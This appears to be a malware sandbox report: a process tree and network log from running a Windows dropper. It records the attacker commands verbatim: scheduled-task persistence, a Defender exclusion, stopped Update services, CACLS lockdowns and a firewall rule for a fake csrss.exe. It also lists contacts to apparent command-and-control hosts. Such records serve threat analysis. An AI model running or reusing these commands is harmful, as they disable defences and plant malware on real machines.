C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 680 -ip 680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4488 -ip 4488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4172 -ip 4172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5076 -ip 5076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40DC.tmp\40DD.tmp\40DE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11110459970800923757,14463519812136531172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A35F.exe

C:\Users\Admin\AppData\Local\Temp\A35F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe

C:\Users\Admin\AppData\Local\Temp\A6EA.exe

C:\Users\Admin\AppData\Local\Temp\A6EA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1th20qt9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1th20qt9.exe

C:\Users\Admin\AppData\Local\Temp\AA18.bat

"C:\Users\Admin\AppData\Local\Temp\AA18.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 440 -ip 440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4124 -ip 4124

C:\Users\Admin\AppData\Local\Temp\AE11.exe

C:\Users\Admin\AppData\Local\Temp\AE11.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1912 -ip 1912

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC1A.tmp\AC2A.tmp\AC2B.bat C:\Users\Admin\AppData\Local\Temp\AA18.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 540

C:\Users\Admin\AppData\Local\Temp\AF69.exe

C:\Users\Admin\AppData\Local\Temp\AF69.exe

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1076 -ip 1076

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 416

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\FCC0.exe

C:\Users\Admin\AppData\Local\Temp\FCC0.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\4DF.exe

C:\Users\Admin\AppData\Local\Temp\4DF.exe

C:\Users\Admin\AppData\Local\Temp\AFB.exe

C:\Users\Admin\AppData\Local\Temp\AFB.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\E19.exe

C:\Users\Admin\AppData\Local\Temp\E19.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5356 -ip 5356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 792

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 48.101.122.92.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
RU 5.42.92.211:80 5.42.92.211 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
US 8.8.8.8:53 bytecloudasa.website udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 hawsteamjoak.fun udp
US 188.114.96.0:80 hawsteamjoak.fun tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
US 188.114.96.0:80 hawsteamjoak.fun tcp
